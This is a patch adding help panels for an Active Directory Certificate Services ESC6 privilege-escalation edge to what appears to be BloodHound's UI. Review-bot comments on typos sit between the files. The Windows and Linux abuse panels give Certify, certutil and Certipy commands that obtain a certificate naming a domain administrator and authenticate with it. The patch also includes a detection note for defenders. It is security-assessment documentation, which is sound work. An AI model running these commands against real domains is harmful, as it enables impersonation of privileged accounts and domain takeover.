From b3a81f10059a9b09fa6c4b88b33d18727345b02a Mon Sep 17 00:00:00 2001 From: Ben Waples Date: Wed, 17 Jan 2024 11:20:31 -0800 Subject: [PATCH] Esc6b finding entity panel (#312) * init files * lower case b * change labels * renamed to b * also rename sub file * remo0ve a * remove extra the --- .../HelpTexts/ADCSESC6b/ADCSESC6b.tsx | 31 +++++++++++ .../HelpTexts/ADCSESC6b/General.tsx | 44 +++++++++++++++ .../HelpTexts/ADCSESC6b/LinuxAbuse.tsx | 48 ++++++++++++++++ .../components/HelpTexts/ADCSESC6b/Opsec.tsx | 31 +++++++++++ .../HelpTexts/ADCSESC6b/References.tsx | 47 ++++++++++++++++ .../HelpTexts/ADCSESC6b/WindowsAbuse.tsx | 55 +++++++++++++++++++ .../src/components/HelpTexts/index.tsx | 2 + 7 files changed, 258 insertions(+) create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx new file mode 100644 index 0000000000..96f5024191 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx 
@@ -0,0 +1,31 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import General from './General'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; +import Opsec from './Opsec'; +import References from './References'; + +const ADCSESC6b = { + general: General, + windowsAbuse: WindowsAbuse, + linuxAbuse: LinuxAbuse, + opsec: Opsec, + references: References, +}; + +export default ADCSESC6b; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx new file mode 100644 index 0000000000..5927a8f974 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx 
@@ -0,0 +1,44 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { groupSpecialFormat } from '../utils'; +import { EdgeInfoProps } from '../index'; +import { Typography } from '@mui/material'; + +const General: FC = ({ sourceName, sourceType, targetName }) => { + return ( + <> + + {groupSpecialFormat(sourceType, sourceName)} the privileges to perform the ADCS ESC6 Scenario B attack + against the target domain. + + + The principal has permission to enroll on one or more certificate templates allowing for authentication. + They also have enrollment permission for an enterprise CA with the necessary templates published. This + enterprise CA is trusted for NT authentication in the forest, and chains up to a root CA for the forest. + The enterprise CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag allowing enrollees to + specify a Subject Alternate Name (SAN) identifying another principal during certificate enrollment of + any published certificate template. This setup allow an attacker principal to obtain a malicious + certificate as another principal. There is an affected Domain Controller configured to allow weak + certificate mapping enforcement, which enables the attacker principal to authenticate with the malicious + certificate and thereby impersonating any AD forest user or computer without their credentials. 
+ + + ); +}; + +export default General; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx new file mode 100644 index 0000000000..275e0334c2 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx @@ -0,0 +1,48 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Box, Typography } from '@mui/material'; + +const LinuxAbuse: FC = () => { + return ( + <> + An attacker may perform this attack in the following steps: + + + Step 1: + {' '} + Use Certipy to request enrollment in the affected template, specifying the target enterprise CA and + target principal to impersonate: + + + { + 'certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC6 -upn administrator@corp.local' + } + + + + Step 2: + {' '} + Request a ticket granting ticket (TGT) from the domain, specifying the certificate created in Step 1 and + the IP of a domain controller: + + {'certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128'} + + ); +}; + +export default LinuxAbuse; 
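Review bot: `targetName` is destructured from the props in General (`({ sourceName, sourceType, targetName })`) but never appears in the rendered text, which `@typescript-eslint/no-unused-vars` would flag; either interpolate it where the text says "against the target domain" or drop it from the destructuring. Two sentences in the second paragraph also read wrong: `This setup allow an attacker principal` should be `This setup allows an attacker principal`, and `thereby impersonating any AD forest user or computer` should be `thereby impersonate any AD forest user or computer`. The enclosing JSX elements are not visible in this rendering of the hunk, so the markup itself could not be checked.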
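Review bot: Step 2 in LinuxAbuse is described as `Request a ticket granting ticket (TGT) from the domain`, i.e. Kerberos certificate authentication, while the General text scopes this edge to a domain controller with weak certificate mapping enforcement and WindowsAbuse Step 3 in the same commit authenticates `via Schannel`; the two abuse sections should describe the same DC-side mechanism for the Scenario B edge. If Schannel is the intended path, the Step 2 wording and the Certipy invocation should mirror the Windows Step 3 description rather than the TGT wording; if not, the General paragraph should say which mechanism the edge actually relies on. The JSX wrapping these strings is not visible in this rendering.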
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx new file mode 100644 index 0000000000..0200106041 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx @@ -0,0 +1,31 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Typography } from '@mui/material'; + +const Opsec: FC = () => { + return ( + + When the affected certificate authority issues the certificate to the attacker, it will retain a local copy + of that certificate in its issued certificates store. Defenders may analyze those issued certificates to + identify illegitimately issued certificates and identify the principal that requested the certificate, as + well as the target identity the attacker is attempting to impersonate. + + ); +}; + +export default Opsec; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx new file mode 100644 index 0000000000..22c80951f9 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx 
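Review bot: The Opsec sentence repeats "identify" and could state the concrete indicator the General text already implies, namely a requester-supplied SAN naming a different principal. A tighter version: `Defenders may analyze those issued certificates to identify illegitimately issued ones, the principal that requested them, and the target identity the attacker is attempting to impersonate; an issued certificate whose Subject Alternative Name does not match the requesting principal is the characteristic indicator of this abuse.` The defender-side detail is consistent with the General description in this commit and gives the reader something actionable to look for in the CA's issued certificates store.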
@@ -0,0 +1,47 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Link, Box } from '@mui/material'; + +const References: FC = () => { + return ( + + + Certified Pre-Owned + +
+ + Certipy 4.0 + +
+ + Domain Escalation Edit Attributes + +
+ ); +}; + +export default References; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx new file mode 100644 index 0000000000..a9b6f1bef5 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx @@ -0,0 +1,55 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Box, Typography } from '@mui/material'; + +const WindowsAbuse: FC = () => { + return ( + <> + An attacker may perform this attack in the following steps: + + + Step 1: + {' '} + Use Certify to request enrollment int he affected template, specifying the affected certification + authority and target principal to impersonate: + + + { + '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA' + } + + + + Step 2: + {' '} + Convert the emitted certificate to PFX format: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + + Step 3: + {' '} + Use Certipy to connect to the domain controller via Schannel, specifying the PFX-formatted certificate + created in Step 2: + + {'certipy auth -pfx .\\cert.pfx -dc-ip 10.4.0.4 -ldap-shell'} + + ); +}; + +export default WindowsAbuse; 
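Review bot: Step 1 of WindowsAbuse contains a user-facing typo, `Use Certify to request enrollment int he affected template`, which should read `Use Certify to request enrollment in the affected template`. Step 1 also calls the CA the `affected certification authority` while the LinuxAbuse Step 1 in this commit calls it the `target enterprise CA`; pick one term across the two sections so the panel reads consistently. The wrapping JSX is not visible in this rendering, so only the string content was reviewed.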
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx index 211f844225..c898b7d475 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx @@ -107,6 +107,7 @@ import WritePKIEnrollmentFlag from './WritePKIEnrollmentFlag/WritePKIEnrollmentF import WritePKINameFlag from './WritePKINameFlag/WritePKINameFlag'; import WriteSPN from './WriteSPN/WriteSPN'; import ADCSESC1 from './ADCSESC1/ADCSESC1'; +import ADCSESC6b from './ADCSESC6b/ADCSESC6b'; export type EdgeInfoProps = { edgeName?: string; @@ -207,6 +208,7 @@ const EdgeInfoComponents = { GoldenCert: GoldenCert, ADCSESC1: ADCSESC1, ADCSESC3: ADCSESC3, + ADCSESC6b: ADCSESC6b, ManageCA: ManageCA, ManageCertificates: ManageCertificates, WritePKIEnrollmentFlag: WritePKIEnrollmentFlag,